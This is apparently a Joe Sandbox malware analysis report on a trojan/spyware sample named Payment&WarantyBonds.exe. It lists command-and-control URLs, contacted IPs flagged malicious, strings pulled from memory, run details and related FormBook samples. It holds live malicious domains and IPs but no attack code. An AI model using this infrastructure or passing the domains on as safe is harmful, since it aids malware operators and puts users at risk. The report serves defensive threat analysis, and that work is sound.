                                                                  http://www.030002059.xyz/2sun/?78=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&hrOd=1DzdIBZXhZaHw2Wptrue
                                                                    		unknown
                                                                    http://www.iampinky.info/nhtq/?78=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&hrOd=1DzdIBZXhZaHw2Wptrue
                                                                      		unknown
                                                                      http://www.cesach.net/dma3/?hrOd=1DzdIBZXhZaHw2Wp&78=IhPPRAmDChEnx8G5Mk3wYKJVvliqClSy7lT3/i9hniKwN2WP3nmtzIAyaYX2MoR3jQRU/NaT7iTCvd3O/fPSuEFMVnQWNGAOAVxjgpJaGw2AUh+P10Czoew=true
                                                                        		unknown
                                                                        http://www.sgland06.online/33ib/?hrOd=1DzdIBZXhZaHw2Wp&78=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI=false
                                                                          		unknown
                                                                          http://www.stationseek.online/wd23/?78=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&hrOd=1DzdIBZXhZaHw2Wptrue
                                                                            		unknown
                                                                            http://www.091210.xyz/jwed/true
                                                                              		unknown
                                                                              http://www.adsa6c.top/wr26/true
                                                                                		unknown
                                                                                http://www.simplek.top/ep69/?78=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&hrOd=1DzdIBZXhZaHw2Wptrue
                                                                                  		unknown
                                                                                  http://www.cotti.club/3ej6/true
                                                                                    		unknown
                                                                                    http://www.030002059.xyz/2sun/true
                                                                                      		unknown
                                                                                      http://www.solarand.online/diem/?hrOd=1DzdIBZXhZaHw2Wp&78=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg=true
                                                                                        		unknown
                                                                                        http://www.basicreviews.online/3xn5/true
                                                                                          		unknown
                                                                                          http://www.adsa6c.top/wr26/?78=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&hrOd=1DzdIBZXhZaHw2Wptrue
                                                                                            		unknown
                                                                                            http://www.297676.com/xyex/true
                                                                                              		unknown
                                                                                              http://www.solarand.online/diem/true
                                                                                                		unknown
                                                                                                http://www.sgland06.online/33ib/false
                                                                                                  		unknown
                                                                                                  http://www.stationseek.online/wd23/true
                                                                                                    		unknown
                                                                                                    http://www.cesach.net/dma3/true
                                                                                                      		unknown
                                                                                                      http://www.basicreviews.online/3xn5/?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&hrOd=1DzdIBZXhZaHw2Wptrue
                                                                                                        		unknown
                                                                                                        http://www.simplek.top/ep69/true
                                                                                                          		unknown

                                                                                                          URLs from Memory and Binaries

                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                          https://duckduckgo.com/chrome_newtabsysteminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.fontbureau.com/designersGPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://duckduckgo.com/ac/?q=systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.fontbureau.com/designers/?Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.founder.com.cn/cn/bThePayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://piensasolutions.com/css/parking2.csssysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.fontbureau.com/designers?Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.stationseek.online/wd23?78=hRp9systeminfo.exe, 00000007.00000002.4107343980.000000000594E000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000031FE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://www.west.cn/services/mail/systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.tiro.comPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://piensasolutions.com/imgs/parking/icon-desplegar.jpgsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.fontbureau.com/designersPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.goodfont.co.krPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correosysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpsysteminfo.exe, 00000007.00000002.4107343980.00000000062BA000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000003B6A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campasysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.sajatypeworks.comPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://www.typography.netDPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://www.google.comsysteminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005F96000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000003846000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.founder.com.cn/cn/cThePayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.galapagosdesign.com/staff/dennis.htmPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsysteminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://www.galapagosdesign.com/DPleasePayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://www.west.cn/cloudhost/systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://www.west.cn/ykj/view.asp?domain=cotti.clubsysteminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://www.fonts.comPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.sandoll.co.krPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.urwpp.deDPleasePayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://www.zhongyicts.com.cnPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensasysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://www.sakkal.comPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wesysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_campsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.extrime1.shoplVlYtqLlYCJP.exe, 00000008.00000002.4108148789.0000000004AD4000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://www.strato.delVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002D48000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://www.fontbureau.comPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://piensasolutions.com/imgs/parking/icon-ssl-parking.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://www.west.cn/services/webhosting/systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://plus.google.com/u/0/102310483732773374239systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.west.cn/services/domain/systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.ecosia.org/newtab/systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://piensasolutions.com/imgs/parking/icon-hosting.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://piensasolutions.com/imgs/parking/icon-web.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.carterandcone.comlPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://ac.ecosia.org/autocomplete?q=systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.fontbureau.com/designers/cabarga.htmlNPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaignsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.founder.com.cn/cnPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlPayment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=domsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://piensasolutions.com/imgs/parking/icon-parking.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://www.west.cn/jiaoyi/systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.jiyu-kobo.co.jp/Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://piensasolutions.com/imgs/parking/icon-facebook-small.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.fontbureau.com/designers8Payment&WarantyBonds.exe, 00000000.00000002.1720652968.0000000006722000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://piensasolutions.com/imgs/parking/icon-twitter-small.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://twitter.com/piensasolutionssysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://piensasolutions.com/imgs/parking/icon-web-sencilla.pngsysteminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                              		unknown

                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                              Public IPs

                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              172.67.154.67
                                                                                                                                                                              		www.091210.xyzUnited States
                                                                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                                                                              13.248.169.48
                                                                                                                                                                              		www.xipowerplay.xyzUnited States
                                                                                                                                                                              		16509AMAZON-02UStrue
                                                                                                                                                                              20.2.249.7
                                                                                                                                                                              		www.adsa6c.topUnited States
                                                                                                                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                                                                                              144.76.190.39
                                                                                                                                                                              		basicreviews.onlineGermany
                                                                                                                                                                              		24940HETZNER-ASDEtrue
                                                                                                                                                                              199.59.243.227
                                                                                                                                                                              		www.297676.comUnited States
                                                                                                                                                                              		395082BODIS-NJUStrue
                                                                                                                                                                              217.160.0.60
                                                                                                                                                                              		solarand.onlineGermany
                                                                                                                                                                              		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                              198.251.84.200
                                                                                                                                                                              		stationseek.onlineUnited States
                                                                                                                                                                              		53667PONYNETUStrue
                                                                                                                                                                              161.97.142.144
                                                                                                                                                                              		www.030002059.xyzUnited States
                                                                                                                                                                              		51167CONTABODEtrue
                                                                                                                                                                              203.161.49.193
                                                                                                                                                                              		www.simplek.topMalaysia
                                                                                                                                                                              		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                                                                              103.120.80.111
                                                                                                                                                                              		www.cotti.clubHong Kong
                                                                                                                                                                              		139021WEST263GO-HKWest263InternationalLimitedHKtrue
                                                                                                                                                                              34.92.128.59
                                                                                                                                                                              		www.sgland06.onlineUnited States
                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                              3.33.130.190
                                                                                                                                                                              		iampinky.infoUnited States
                                                                                                                                                                              		8987AMAZONEXPANSIONGBtrue
                                                                                                                                                                              152.42.255.48
                                                                                                                                                                              		extrime1.shopUnited States
                                                                                                                                                                              		81NCRENUStrue
                                                                                                                                                                              217.76.156.252
                                                                                                                                                                              		www.cesach.netSpain
                                                                                                                                                                              		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                                                                                                                                              General Information

                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1545791
                                                                                                                                                                              Start date and time:2024-10-31 01:36:09 +01:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 10m 36s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:9
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:2
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Sample name:Payment&WarantyBonds.exe
                                                                                                                                                                              (renamed file extension from bat to exe)
                                                                                                                                                                              Original Sample Name:Payment&WarantyBonds.bat
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/2@15/14
                                                                                                                                                                              EGA Information:
                                                                                                                                                                              • Successful, ratio: 75%
                                                                                                                                                                              HCA Information:
                                                                                                                                                                              • Successful, ratio: 92%
                                                                                                                                                                              • Number of executed functions: 96
                                                                                                                                                                              • Number of non-executed functions: 257
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                              Warnings

                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.

                                                                                                                                                                              Simulations

                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                              20:37:04API Interceptor1x Sleep call for process: Payment&WarantyBonds.exe modified
                                                                                                                                                                              20:38:12API Interceptor10968576x Sleep call for process: systeminfo.exe modified

                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                              IPs

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              13.248.169.48HSBC Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.yanta.org/1nfd/
                                                                                                                                                                              INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.tangible.online/5byq/
                                                                                                                                                                              SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.telforce.one/ykhz/
                                                                                                                                                                              rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.proworker.shop/0z5y/
                                                                                                                                                                              19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.moneta.life/t37h/
                                                                                                                                                                              yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                              • www.findbc.com/
                                                                                                                                                                              Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.lunch.delivery/qwed/
                                                                                                                                                                              FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                              • www.how2.guru/7eim/
